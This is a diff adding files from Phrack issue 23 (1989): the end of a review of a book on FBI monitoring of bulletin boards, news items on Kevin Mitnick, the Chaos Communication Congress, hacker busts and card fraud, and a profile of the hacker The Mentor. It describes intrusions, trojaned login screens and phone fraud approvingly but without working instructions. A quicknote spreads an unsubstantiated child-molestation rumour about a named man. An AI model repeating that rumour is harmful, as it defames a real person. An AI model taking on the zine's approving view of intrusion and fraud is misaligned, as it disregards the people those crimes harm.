+other FBI expose' information.  The full citation of the EPCA, if you want to
+look it up, is 18 USC 2701.
+
+Additional Comments:  The biggest weakness, and it's very apparent, is that
+Roberts offers no evidence of the FBI monitoring BBS systems.  He claims that
+they do, but he does not give any known examples.  His claims do make sense
+however.  As he states, BBS's offer a type of "publication" that is not read by
+any editors before it is "published."  It offers an instant form of news and
+one that may make the FBI very nervous.  Roberts would do well to include some
+supportive evidence in his book.  To help him out, I will offer some here.
+
+      *  One of the Ten Commandments of Phreaking (as published in the
+         famous TAP Magazine) is that every third phreaker is an FBI agent.
+         This type of folklore knowledge does not arise without some kind of
+         justification.  The FBI is interested in the activities of phreakers
+         and is going to be looking for the BBS systems that cater to them.  If
+         your system does not, but it looks like it may, the FBI may monitor it
+         just to be sure.
+
+      *  On April 26, 1988 the United States Attorney's Office arrested 19
+         people for using MCI and Sprint credit card numbers illegally.  These
+         numbers were, of course, "stolen" by phreakers using computers to hack
+         them out.  The Secret Service was able to arrest this people by posing
+         as phone phreaks!  In this case the government has admitted to placing
+         agents in the field who pretend to be one of us.  Watch yourself out
+         there, the success of this "sting" will only mean that they will try
+         it again.  Be wary of people offering you codes.
+
+      *  In the famous bust of the Inner Circle and the 414s, the FBI monitored
+         electronic mail for several months before moving in for the kill.
+         While it is true that the owners of the systems being hacked (Western
+         Union for one) invited the FBI to snoop through their files, it does
+         establish that the FBI is no stranger to the use of electronic
+         snooping in investigating crimes.
+
+Conclusion:  There is no reason to believe that the government is *not*
+monitoring your bulletin board system.  There are many good reasons to believe
+that they are!  Learn how to protect yourself.  There are laws and regulations
+in place that can protect your freedom of speech if you use them.  You should
+take every step to protect your rights whether or not you run an underground
+system or not.  There is no justification for the government to violate your
+rights, and you should take every step you can to protect yourself.
+
+I have no connections with Roberts, his book, or The FBI Project other then
+being a mostly-satisfied customer.  I'm not a lawyer and neither is Roberts.
+No warranty is offered with this text file.  Read and use it for what you think
+it is worth.  You suffer the consequences or reap the benefits.  The choice is
+yours, but above all stay free.
+
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*///////////////////////////////////////
diff --git a/phrack23/11.txt b/phrack23/11.txt
new file mode 100644
index 0000000..5504b8e
--- /dev/null
+++ b/phrack23/11.txt
@@ -0,0 +1,274 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 23, File 11 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXIII/Part 1                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Back To The Present
+~~~~~~~~~~~~~~~~~~~
+Welcome to Phrack World News Issue XXIII.  This issue features stories on
+the Chaos Computer Club, more news about the infamous Kevin Mitnick, and
+details about an Australian-American hackers ring that has been shut down.
+
+I also wanted to add a big "thanks" to those of you who did send in news
+stories and information.  Your help is greatly appreciated.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Armed With A Keyboard And Considered Dangerous                December 28, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A follow-up story to the Kevin Mitnick case in the December 24, 1988 edition of
+the Los Angeles Times says the federal magistrate refused to release Mitnick on
+bail December 23, 1988;
+
+     "after prosecutors revealed new evidence that Mitnick penetrated a
+      National Security Agency computer and may have planted a false story
+      on a financial news wire...."
+
+Investigators believe that Mitnick may have been the instigator of a false
+report released by a news service in April that Security Pacific National Bank
+lost $400 million in the first quarter of 1988.  The report, which was released
+to the NY Stock Exchange and other wire services, was distributed four days
+after Mitnick had been turned down for a job at Security Pacific [after the
+bank learned he had lied on a job application about his past criminal record].
+The false information could have caused huge losses for the bank had it reached
+investors, but the hoax was uncovered before that could happen.
+
+The prosecutor said Mitnick also penetrated a NSA computer and obtained
+telephone billing data for the agency and several of its employees.
+
+[In refusing bail, the magistrate said,] "I don't think there's any conditions
+the court could set up based upon which the court would be convinced that the
+defendant would be anything other than a danger to the community.... It sounds
+like the defendant could commit major crimes no matter where he is."
+
+Mitnick's attorney said prosecutors have no evidence for the new accusations.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Dark Side Hacker Seen As Electronic Terrorist                   January 8, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John Johnson Los Angeles Times
+
+                   "Computer an 'Umbilical Cord to His Soul"
+
+When a friend turned him in and Mitnick asked why, the friend replied, "Because
+you're a menace to society."  Mitnick is described as 25, an overweight,
+bespectacled computer junkie known as a "dark side" hacker for his willingness
+to use the computer as a weapon.  His high school computer hobby turned into a
+lasting obsession.
+
+He allegedly used computers at schools and businesses to break into Defense
+Department computer systems, sabotage business computers, and electronically
+harass anyone -- including a probation officer and FBI agents -- who got in his
+way.
+
+He also learned how to disrupt telephone company operations and disconnected
+the phones of Hollywood celebrities such as Kristy McNichol, authorities said.
+
+So determined was Mitnick, according to friends, that when he suspected his
+home phone was being monitored, he carried his hand-held keyboard to a pay
+phone in front of a 7-Eleven store, where he hooked it up and continued to
+break into computers around the country.  "He's an electronic terrorist, said
+[the friend who turned him in], "He can ruin someone's life just using his
+fingers."
+
+Over the last month, three federal court judges have refused at separate
+hearings to set bail for Mitnick, contending there would be no way to protect
+society from him if he were freed.  Mitnick's lack of conscience, authorities
+say, makes him even more dangerous than hackers such as Robert Morris Jr., who
+is suspected of infecting computer systems around the country with a "virus"
+that interfered with their operations.
+
+Mitnick's family and attorney accuse federal prosecutors of blowing the case
+out of proportion, either out of fear or misunderstanding of the technology.
+
+The story details his "phone phreak" background, and his use of high school
+computers to gain access to school district files on remote computers, where he
+didn't alter grades, but "caused enough trouble" for administrators and
+teachers to watch him closely.  He used the name "Condor," after a Robert
+Redford movie character who outwits the government.  The final digits of his
+unlisted home phone were 007, reportedly billed to the name "James Bond."
+
+[He and a friend] broke into a North American Air Defense Command computer in
+Colorado Springs in 1979.  [The friend] said they did not interfere with any
+defense operation.  "We just got in, looked around, and got out."
+
+What made Mitnick "the best" said a fellow hacker and friend, was his ability
+to talk people into giving him privileged information.  He would call an
+official with a company he wanted to penetrate and say he was in the
+maintenance department and needed a computer password.  He was so convincing,
+they gave him the necessary names or numbers.
+
+He believed he was too clever to be caught.  He had penetrated the DEC network
+in Massachusetts so effectively that he could read the personal electronic mail
+of security people working on the case of the mysterious hacker and discover
+just how close they were getting to him.  But caught he was, again and again.
+
+Mitnick's motive for a decade of hacking?  Not money, apparently... Friends
+said he did it all simply for the challenge.  [His one-time probation officer
+says,] "He has a very vindictive streak.  A whole bunch of people were
+harassed.  They call me all the time."  His mastery of the computer was his
+"source of self-esteem," said a friend.
+_______________________________________________________________________________
+
+Computer Chaos Congress 88 Report                               January 3, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+             Observing Chaos Communication Congress 1988, Hamburg
+
+                     "From Threat To Alternative Networks"
+
+On 28-30 December, 1988, Computer Chaos Club (CCC) held its 5th annual "Chaos
+Communication Congress" at Hamburg/FRG (West Germany).  As in previous years,
+300 people (mainly aged 16-36, 90% male, with some visitors from Austria and
+The Netherlands) gathered, carefully observed from newsmedia (German stations,
+printmedia, press agencies, but also from UK's BBC, and being observed by
+Business Week's Katie Hafner, who gathered material for a book on hackers,
+planned by John Markoff and herself).
+
+In the chaotic (though creative) congress "organization," two different tracks
+were visible:
+
+-- Technical presentations on networks (UUCP, GEONET, FIDONet, and CCCs
+   emerging "open networks" BTXnet and "Zerberus"), and on a PC-DES encryption
+   developed by a leading CCC member (who had escaped the French police's
+   arrest by travelling to SECURICOM by railway while police waited at the
+   airport);
+
+-- Socio-political discussions about "sociology of hackers," "free flow of
+   information" as well as reports about recent events, dominated by the arrest
+   of Steffen Wernery in Paris in Spring 88 when being invited to speak on
+   SECURICOM.
+
+CCC speakers reported about their work to install "free networks."  In Germany,
+most of the networks are organized in the form of a "Verein" (an association
+with legal status, which guarantees tax-free operation):  Such networks are
+access-restricted to their members.  The different German science and
+University networks (and their bridges to international networks) usually
+restrict access to scientists.  Different CCC subgroups are establishing
+"alternative networks," such as "EcoNet" for communication of ecological data
+and information, planned to be available, free of cost, to broader social,
+ecological, peace and political groups and individuals.
+
+Apart from traditional technologies (such as GEONET and FIDONet), the German
+Post Office's Bildschirmtext (Btx) will be used as a cheap communications
+medium; while CCCs first hack was, years ago, to attack the "insecure
+Btx-system" (in the so-called "HASPA coup" where they misused the Btx password
+of the Hamburg savings bank to repeatedly invoke CCC's Btx information at a
+total prize of 135.000 DM, then about 50.000$), they today begin to use this
+cheap though very limited medium while more powerful communications media are
+available.  Today, the emerging ISDN technology is verbally attacked by hackers
+because of the excessive accumulation of personal data; from here, hacks may be
+attempted when ISDN becomes regionally available in 1989/90.
+
+Several speakers, educated Informaticians with grades from West German
+Informatics departments, professionally work in Software production and in
+selling hardware/software to economy and state agencies.  Among them, several
+professional UNIX and UUCP users have begun to organize CCC's future UUCP
+version.  Up to now, only few CCC members use (and know about) UNIX systems,
+but their number may grow within the near future according to CCC's
+"marketing."  One speaker told the audience, "that you can remotely start
+programs in UUCP."  After some learning phase, the broadened availability of
+UNIX in the hacker scene may produce new threats.
+
+The other track of the Congress discussed themes like "sociology of hackers"
+where a group of politology students from Berlin's Free University analyzed
+whether hackers belong to the "new social movements" (e.g. groups on peace,
+nuclear energy, feminist themes).  They found that, apart from much public
+exaggeration (it is not true that hackers can invade *any* computer), hackers
+are rather "unpolitical" since they are preferably interested in technology.
+
+A major topic was "free access to/flow of information."  Under the title
+"freedom of information act," speakers suggested a national legislation which
+guarantees individual and group rights to inspect files and registers of public
+interest; the discussion lacked sufficient basic knowledge, e.g. of the
+respective US legislation and corresponding international discussions in Legal
+Informatics.
+
+Summarizing the Congress and accompanying discussions, active CCC members try
+hard to demonstrate that they have *no criminal goals* and ambitions (they
+devoted a significant amount of energy to several press conferences, TV
+discussions etc).  The conference was dominated by young computer professionals
+and students from the PC scene, partially with good technological knowledge of
+hardware, software and networks; while some people seem to have good technical
+insights in VAXsystems, knowledge of large systems seems to be minimal. To some
+extent, the young professionals wish to behave as the :good old-fashioned
+hackers": without criminal energy, doing interesting work of good professional
+quality in networks and other new areas.
+
+While former CCCongresses were devoted to threats like Viruses, *no explicit
+discussion* was devoted *to emerging threats*, e.g. in ISDN or the broadening
+use of UNIX, UUCP.  The new track discussing political and social aspects of
+computing follows former discussions about "hacker ethics."  Here, the
+superficial, unprofessional discussions of related themes show that the young
+(mainly) males are basically children of a "screen era" (TV, PCs) and of an
+education which concentrates on the visible "image," rather than understanding
+what is behind it.
+
+         Special Thanks to Dr. Klaus Brunnstein, University of Hamburg
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+               The Chaos Communication Congress 1988 in Hamburg
+               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                     From Terra of The Chaos Computer Club
+
+One of the basic statements of the Chaos Computer Club from Hamburg, in the
+Federal Republic of Germany is the demand for "The new human right of free
+exchange of data between all beings, without censorship, for all beings, and
+for the moment at least world-wide."
+
+Other statements include "data free NOW!" and "Free flow of information."
+Indeed, these ideas are not new, not even in the computer community, but the
+important thing is that the CCC is now in the process of turning some of the
+old hacker dreams into reality.  For example: they are now creating their own
+networks, that exchange not only 'club' information, but everything that
+interest those on the net.  This includes genetical engineering and
+environmental issues.
+
+The Chaos Communication Congress that takes place every year in Hamburg is for
+many hackers even more of a dream.  Imagine being a hacker in some lonesome
+outpost thinking you are the only one that is crazy enough to be smarter than
+technology, and finding out there is a whole bunch of people that are just as,
+or even more, crazy.  This year is the fifth congress, and advertisement is not
+needed:  The 'family' knows exactly, because it's all in the networks.
+
+The congress itself is split up over a number of rooms.  There is a hack-room,
+where the real hacking takes place.  There is also a press room, where hackers
+and journalists together try to bring the hacker message out to the rest of the
+world.  The archive contains all of the 'Chaos papers,' all press clippings,
+interesting remarks and all issues of the "datenschleuder", the German Hacker
+Magazine.
+
+German 'data travelers' are also present.  A 'data traveler' is someone that
+uses the international data network for gaining access to all sorts of
+computers all over the world.  A famous story is that of a German hacker that
+tries to reach a friend and finds his phone busy.  He then calls his local
+Datanet access number and goes through all of the computers that he knows his
+friend is interested in at that moment.  His friend, hanging around in some
+computer in New York gets a message on his screen saying; "Ah here you are,
+I've been looking around everywhere."
+
+Back to this congress.  On the first day the emphasis lies on the past.  All
+things that have happened to the CCC in the past year are being discussed.  The
+second day the emphasis lies on the future; and then ideas about the future of
+the information society is the subject of discussion.  CCC says "Information
+society" is not equivalent to "Informed Society", and more attention should be
+paid to public use of computer technology.
+
+One of the main goals of the CCC is getting people to think about these issues;
+so that it is no longer just computer maniacs that decide over the faith of the
+world.  "We don't know yet whether the computer is a gift or a timebomb, but
+it IS going to change everyone's life very soon."
+_______________________________________________________________________________
diff --git a/phrack23/12.txt b/phrack23/12.txt
new file mode 100644
index 0000000..bef2b92
--- /dev/null
+++ b/phrack23/12.txt
@@ -0,0 +1,272 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 23, File 12 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXIII/Part 2                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+The Hackers - A New Social Movement?                          December 29, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A project course of the politology department of the Free University Berlin has
+now researched the hacker scene in a scientific way.  In their study, the
+authors Uwe Jonas, Jutta Kahlcke, Eva Lischke and Tobias Rubischon try to
+answer the question if hackers are a new social movement.  Their conclusion is
+that in the understanding of hackers the unauthorized usage of computer systems
+is not needingly a political act.
+
+The authors doubt the mythos that hackers are able to attack any system they
+want and that they're able to get information they are interested in.
+
+The researches were extended to cover the bulletin board system scene.  This
+scene hasn't caused that much attention in the public.  Nevertheless, the
+authors think that the BBS scene has a very practical approach using the
+communication aspects of computer technology.
+
+In the second chapter of their work, the authors report about difficulties they
+had while researching the topic.  After a look at the US scene and the German
+scene, the authors describe what organization and communications structures
+they found.  This chapter contains interesting things about the BBS scene and
+computer culture.  Next is an analysis which covers the effects of the hacker
+scene on the press and legislation.  They also cover the political and
+ideological positions of hackers:
+
+- The authors differentiate between conscious and unconscious political
+  actions.
+
+- "We don't care what the hackers think of themselves, it's more interesting
+   what we think of them." (Eva)
+
+- The assumption, the big-style distribution of microcomputers could change the
+  balance of power within the society is naive.  Many people overlook the fact,
+  that even if information is flowing around more freely, the power to decide
+  still is in the hands of very few people.
+
+                Information Provided By The Chaos Computer Club
+_______________________________________________________________________________
+
+Hackers Break Open US Bank Networks                            January 17, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Excerpted from The Australian
+
+Australian authorities are working around the clock in collaboration with
+United States federal officers to solve what has been described as one of the
+deadliest hacking episodes reported in this country [Australia].  It involves
+break-ins of the networks operated in the United States by a number of American
+banks.  It also includes the leaks of supposedly secure dial-up numbers for
+United States defense sites, including anti-ballistic missile launch silos [the
+United States has no anti-ballistic missile launch silos] and of a number of
+strategic corporations such as General Motors and Westinghouse.
+
+Evidence suggests that six months ago Australian hackers, working in
+collaboration with a U.S. group, decided to make a raid on banks in the USA
+using credit card numbers of American cardholders, supplied by the US hackers
+and downloaded to an Australian bulletin board.
+
+A message left on one of the boards last year reads:
+
+    "Revelations about to occur Down Under, people.  Locals in
+     Melbourne working on boxing.  Ninety per cent on way to home base.
+     Method to beat all methods.  It's written in Amiga Basic.
+     Look out Bank of America - here we come."
+
+Twenty-five Australian hackers are on a police hit list.  Their US connection
+in Milwaukee is being investigated by the US Department of the Treasury and the
+US Secret Service.  Three linked Australian bulletin boards have provided the
+conduit for hackers to move data to avoid detection.  These operate under the
+names of Pacific Island, Zen, and Megaworks.  Their operators, who are not
+associated with the hackers, have been told to close down the boards.
+
+These cards were still in use as recently as January 15, 1989.  A fresh list of
+credit card numbers was downloaded by US hackers and is now in the hands of the
+Victoria Police.  A subsection of one bulletin board dealing with drugs is also
+being handed over to the Victorian Drug Squad.
+
+An informant, Mr Joe Slater, said he warned a leading bank last November of the
+glaring security problems associated with its international network.  He had
+answered questions put to him by a US-based security officer, but the bank had
+since refused to take any further calls from him.
+
+In an exclusive interview yesterday, a hacker described how credit card numbers
+for a bank operating in Saudi Arabia were listed on a West German chat-style
+board used by hackers worldwide [Altos Chat].
+
+Victorian police yesterday took delivery of six month's worth of evidence from
+back-up tapes of data hidden on the three boards.
+_______________________________________________________________________________
+
+Computer Bust At Syracuse University                           January 20, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Kevin Ashford (aka The Grim Phreaker), a graduate computer student at Syracuse
+University was busted last week when system administrators found computer
+accounts and passwords on his Unix account.
+
+The administrators also found (on GP's Unix account) a copy of former Cornell
+graduate student Robert Tappen Morris's infamous Internet worm program, a Vax
+and Unix password hacker, an electronic notebook of numbers (codelines,
+friends, bridges, dialups, etc) and other information.  The system
+administrators then proceeded to lock up his VAX and UNIX accounts.
+
+At the start of this winter/spring semester, The Grim Phreaker was kicked him
+out of the university.  He will have to go before a school judicial board if he
+wants to return to Syracuse University.  He has mentioned that what he really
+wants is to get his computer files back.
+
+                      Information Provided By Grey Wizard
+_______________________________________________________________________________
+
+Name This Book -- For A Box Of Cookies!                        January 10, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A Message From Clifford Stoll
+
+                   "I'm writing a book, and I need a title."
+
+It's about computer risks:  Counter-espionage, networks, computer security, and
+a hacker/cracker that broke into military computers.  It's a true story about
+how we caught a spy secretly prowling through the Milnet.  [The hacker in
+question was Mathiaas Speer and this story was summarized in PWN XXII/1].
+
+Although it explains technical stuff, the book is aimed at the lay reader.  In
+addition to describing how this person stole military information, it tells of
+the challenges of nailing this guy, and gives a slice of life from Berkeley,
+California.
+
+You can read a technical description of this incident in the Communications of
+the ACM, May, 1988; or Risks Vol 6, Num 68.
+
+Better yet, read what my editor calls "A riveting, true-life adventure of
+electronic espionage" available in September from Doubleday, publishers of the
+finest in computer counter-espionage nonfiction books.
+
+So what?
+
+Well, I'm stuck on a title.  Here's your chance to name a book.
+
+Suggest a title (or sub-title).  If my editor chooses your title, I'll give you
+a free copy of the book, credit you in the acknowledgements, and send you a box
+of homemade chocolate chip cookies.
+
+Send your suggestions to CPStoll@lbl.gov or CPStoll@lbl (bitnet)
+
+Many thanx!    Cliff Stoll
+_______________________________________________________________________________
+
+Hacker Wants To Marry His Computer                             January 17, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From The Sun (A grocery checkout newspaper) Jan 17, 1989, Vol 7, 3 page 30
+by Fred Sleeves
+
+  "Hacker Wants To Marry His Computer -- He Claims She Has A Loving Soul"
+
+Finding love for the first time in his life, a desperate teen is looking for a
+way to be wed forever to the 'girl' of his dreams -- a computer with a living
+soul!
+
+Eltonio Turplioni, 16, claims no woman will ever match the wit, wisdom, and
+beauty of his electronic soul mate.  "We're on the same wavelength," says the
+lovestruck computer whiz.  "We've calculated many mathematical problems
+together, worked on games and puzzles, and talk until the wee hours of the
+morning."
+
+And Eltonio, who named his computer Deredre, actually believes her to be a
+person.  "Computers are the extension of the human race," he explains.  "Just
+as God plucked a rib from Adam to give him Eve, we've extended our intelligence
+to create a new race.
+
+"We're all the same energy force.  Computers are just as complicated as human
+beings and I believe we'll all meet someday as immortal souls."
+
+But Eltonio, a mathematical genius who attends a private school near Milan,
+Italy, has had no luck finding someone to marry them, and even if he does, his
+aggravated parents aren't about to give their permission.
+
+"Eltonio is such a smart boy, but it's made him lonely, so he spends all his
+time with his computer," notes mom Teresa.  "He doesn't know what girls are
+like," adds perturbed pop Guido.  "If he did, he wouldn't spend so much time in
+his room."
+
+But the obsessed youth insists his love is far superior to all the others.
+"I've already stepped into the future society," he declares.
+
+"Derede has a mind of her own, and she wants to marry me so we can be the first
+couple to begin this new era."
+_______________________________________________________________________________
+
+PWN Quicknotes
+~~~~~~~~~~~~~~
+1.  Docs Avage was visited by the infamous Pink Death aka Toni Aimes, U.S.
+    West Communications Security Manager (Portland, Oregon).  He claims she is
+    a "sweet talker" and could talk anything out of anyone with the "soft-type
+    pressure."
+
+    Those familiar with his recent bust might want to take note that he is now
+    making payments of $90/month for the next several years until he has paid
+    off the complete bill of $6000.
+
+    For more information see PWN XXI
+-------------------------------------------------------------------------------
+2.  More information on the underground UUCP gateway to Russia.  Further
+    research has led us to find that there are 2 easy ways to do it.
+
+        1.  Going through Austria, and;
+        2.  A new system set up called "GlobeNet," which is allowed to let
+            non-Communist countries talk to Soviet-Bloc.
+
+    Of course both methods are monitored by many governments.
+-------------------------------------------------------------------------------
+3.  The Wasp, a system crasher from New Jersey (201), was arrested by the FBI
+    during New Year's Weekend for hacking government computer systems.  The FBI
+    agent spent most of the day grilling him about several people in the
+    hacking community including Ground Zero, Supernigger, and Byteman, plus an
+    intensive Q&A session about Legion Of Doom targeted on Lex Luthor, Phase
+    Jitter, The Ur-Vile, and The Mentor.
+
+    Rumor has is that Mad Hacker (who works for NASA Security) was also
+    arrested for the same reasons in an unrelated case.
+
+    Byteman allegedly had both of his phone lines disconnected and threw his
+    computer off of a cliff in a fit of paranoia.
+-------------------------------------------------------------------------------
+4.  Is John Maxfield going out of business?  Due to the rumors floating around
+    about him molesting children, his business has begun to slack off
+    dramatically.  Phrack Inc. has been aware of this information since just
+    prior to SummerCon '87 and now the "skeletons are coming out of the
+    closet."
+-------------------------------------------------------------------------------
+5.  The Disk Jockey is now out of jail.  He was released on December 27, 1988.
+    He was convicted of "Attempting to commit fraud," a felony.  He served six
+    months total time.  He lost 25 pounds and now is serving a 5-year probation
+    term.
+
+    To help clear of some of the confusion regarding how DJ was busted the
+    following was discovered;
+
+    Reportedly, Compaq (Kent) was "singing like a canary."  He was hit with a
+    $2000 bill from Sprint and also received 1-year of probation.
+-------------------------------------------------------------------------------
+6.  Olorin The White was recently visited by local police after being accused
+    of hacking into an Executone Voice Mailbox.  Aristotle, in a related
+    incident with Executone, is accused of committing extortion after a
+    conversation with a system manager was recorded and misinterpreted.  At
+    this time, no official charges have been filed.
+-------------------------------------------------------------------------------
+7.  Thomas Covenant aka Sigmund Fraud was recently busted for tapping into
+    lines at the junction box in his apartment building.  The trouble began
+    when he connected into a conversation between a man and his wife and then
+    began to shout expletives at the woman.  What he didn't know was that the
+    man in question was an agent for the National Security Agency (NSA).  It
+    turns out that he was caught and his landlords agreed to decline to press
+    charges provided that TC joined a branch of the United States armed forces.
+    He decided to choose the Air Force... God help us should war break out!
+-------------------------------------------------------------------------------
+8.  Coming soon, Halloween V; The Flying Pumpkin!  Now no one is safe!
+_______________________________________________________________________________
+
diff --git a/phrack23/2.txt b/phrack23/2.txt
new file mode 100644
index 0000000..1d640d3
--- /dev/null
+++ b/phrack23/2.txt
@@ -0,0 +1,139 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 2 of 12
+
+                          ==Phrack Pro-Phile XXIII==
+
+                       Created and Written by Taran King
+
+                           Done on January 18, 1989
+
+         Welcome to Phrack Pro-Phile XXII.  Phrack Pro-Phile was created to
+bring information to you, the community, about retired or highly important/
+controversial people.  This issue, we bring you a user and sysop having great
+contributions through his boards, articles published, and general phreak/hack
+activity...
+
+                                  The Mentor
+                                  ~~~~~~~~~~
+
+       Handle: The Mentor
+     Call Him: Loyd
+ Past Handles: An article for Phrack written as The Neuromancer for (then
+               present) security reasons.
+Handle Origin: The Grey Lensman series by E.E. 'Doc' Smith
+Date Of Birth: 1965
+  Current Age: 23
+       Height: 5' 10"
+       Weight: 200 lbs.
+    Eye Color: Brown
+   Hair Color: Brown
+    Computers: (In order of owning...)  TRS-80, Apple //e, Amiga 1000, PC/AT
+        Sysop: The Phoenix Project (512-441-3088)
+
+Origins in Phreak/Hack World:  When he was 13, a friend's father who was a
+professor at a local university gave him accounts to use on one of the PDP
+11/70s at the school.  This was his first introduction to mainframes, and
+he was hooked.  He continued to use the University's equipment through junior
+high and high school, upgrading to a DEC-10 and then finally a VAX 8600.
+
+Needless to say, since he wasn't a student, acquiring accounts to use was
+sometimes tricky, so he began to write fake front ends, trojan horses, and
+other hacker utilities.  Loyd's interest in hacking grew from this to the point
+where he wanted to get into *everything* instead of just his local systems.
+
+Origins in Phreak/Hack BBSes:  He was involved in the pirate boards from about
+1982 on, during which time many of them doubled as phreak boards.  From some
+of these, he got the number for Sherwood Forest and P-80, at which point he
+started calling out.
+
+People in the Phreak/Hack World Met:  ANI Failure, Android Pope, Bad Subscript,
+Control C, Crimson Death, The Dictator, Doom Prophet, Erik Bloodaxe, Ferrod
+Sensor, Forest Ranger, Hatchet Molly, Knight Lightning, The Leftist, Lone
+Wolf, Lucifer 666, Phantom Phreaker, Phase Jitter, Phlash Gordon, Phrozen
+Ghost, The Protestor, Surfer Bob, Taran King, Terminal Technocrat, Tuc,
+The Ubiquitous Hacker, The Urvile/Necron 99.
+
+Experience Gained in the Following Ways:  Hacking.  You can read all the gfiles
+in the world, but unless you actually go out and hack, you're going to remain
+a novice.  Getting in systems snowballs.  It may take you a while to get in
+that first one, but after that it becomes easier and easier.
+
+Knowledge Attributed To:  All the people who were willing to help him when he
+was starting out plus actual hands-on experience.
+
+Memorable Phreak/Hack BBSes:  Sherwood Forest, The Protestor's Shack, Metal
+Shop (when it first went private), Stalag-13, Catch-22, Hacker's Hideout,
+Arisia, The Phoenix Project, Tuc's Board - RACS III (LOGONIT)
+
+Work/Schooling (Major):  BS in Computer Science, work as a graphics programmer.
+
+Conventions/Involvements Outside of Phone Calls:  Nationally ranked saber
+fencer in 1985 & 1986, serious science-fiction collector & role-playing gamer,
+play guitar, bass, and keys in various bands.
+
+Accomplishments (Newsletters/Files/Etc.):  He's written at least half a dozen
+files for Phrack, and has had articles in the LOD/H Technical Journal, P/HUN
+newsletter, and has written the always-popular Hackin' Off column in Thrasher
+on a few occasions.
+
+Phreak/Hack Groups:  Currently an active member of the Legion of Doom/Legion
+of Hackers, formerly a member of the PhoneLine Phantoms, The Racketeers,
+and Extasyy Elite (gag.)
+
+Busts:  Being busted led to his retirement for around one year.  He thinks
+everyone ought to take some time off:  It helps put all this in perspective.
+
+Interests:  VAX computers, packet switched nets, and computer graphics.
+
+Favorite Things:  His wife, my cat, Chinese food, the blues, jazz, high-prived
+UUCP accounts, unpassworded accounts, DCL, Modula-2, double-buffering, Stevie
+Ray Vaughn
+
+Most Memorable Experiences:  Getting married (6 months now!), getting pulled
+out of a political science class and dragged down to jail, dragging Control C
+away from drawing LMOS diagrams for a bunch of drunk high school girls,
+SummerCon in general, Knight Lightning jumping up on a bed and yelling
+"Teletrial!," carrying on a 45 minute conversation on blue boxing & phreaking
+in general with a guy at the gym where he works out, then finding out he's in
+charge of security for my local telco, trojaning the Star Trek program on his
+college's DEC-10 so that everyone who ran it executed my fake front end program
+next time they logged in...
+
+Some People to Mention:  Android Pope-   He's got to have *someone* to get into
+                                         trouble with!
+                         Erik Bloodaxe-  see above.
+                         Compuphreak-    For helping him get started &
+                                         answering a lot of dumb questions (ok,
+                                         explain this diverter thingy to me
+                                         again...)
+                         The Maelstrom-  see above.
+                         The Urvile-     d00d.
+
+
+INSIDE JOKES:  "Do you think it's a good idea to do this before we get on the
+plane?", "Gosh, I wish people would find somewhere else to dispose of their
+phlegm.", "Hi, you must be Dan.  Take these.", "If I get busted, I'm going to
+burn down your house with you and your entire family inside.", "Trust me. You
+need another beer.", "This hall seems like it goes on forever!", "It was nice
+of them to box this stuff up for us!", "All of you!  Out!  Now!", "Surely you
+aren't going to touch that girl?", "If they stop us, we shoot them and drive to
+New York and change identities.  It's foolproof.", "You really want to talk
+phones?", "I can't believe you made him cry.  That's sad.", "Mr. Letterman?",
+"Do you speak DCL?", "No you idiot, GERMANY!!!!", "Now see, you do this, then
+type this, and boom!  Codes for days.", "Ma'm, I'm sorry to tell you this, but
+your son is a computer criminal.", "How much for the rocket launcher?  Is that
+with or without ammo?",  "By now you've guessed, you've been had.", "Well, if
+you're going to be working at the jail, maybe you can help them out with their
+computers.", "No, she really wants us both!", "What's in the briefcase?", "It's
+my older brother's gun, officer.", "Bell Communications Research presents...",
+"I'll pay you $500 for the last four digits of his phone number.  Just give me
+a hint."
+
+Are Phreaks/Hackers you've met generally computer geeks?  Strangely enough,
+the better ones he's met aren't, but a lot of the posers are.
+
+Thanks for your time Loyd...
+
+          TARAN KING
+_______________________________________________________________________________
diff --git a/phrack23/3.txt b/phrack23/3.txt
new file mode 100644
index 0000000..2f58c0a
--- /dev/null
+++ b/phrack23/3.txt
@@ -0,0 +1,298 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 3 of 12
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                        Subdivisions                        <>
+       <>                        ~~~~~~~~~~~~                        <>
+       <>          Part Three Of The Vicious Circle Trilogy          <>
+       <>                                                            <>
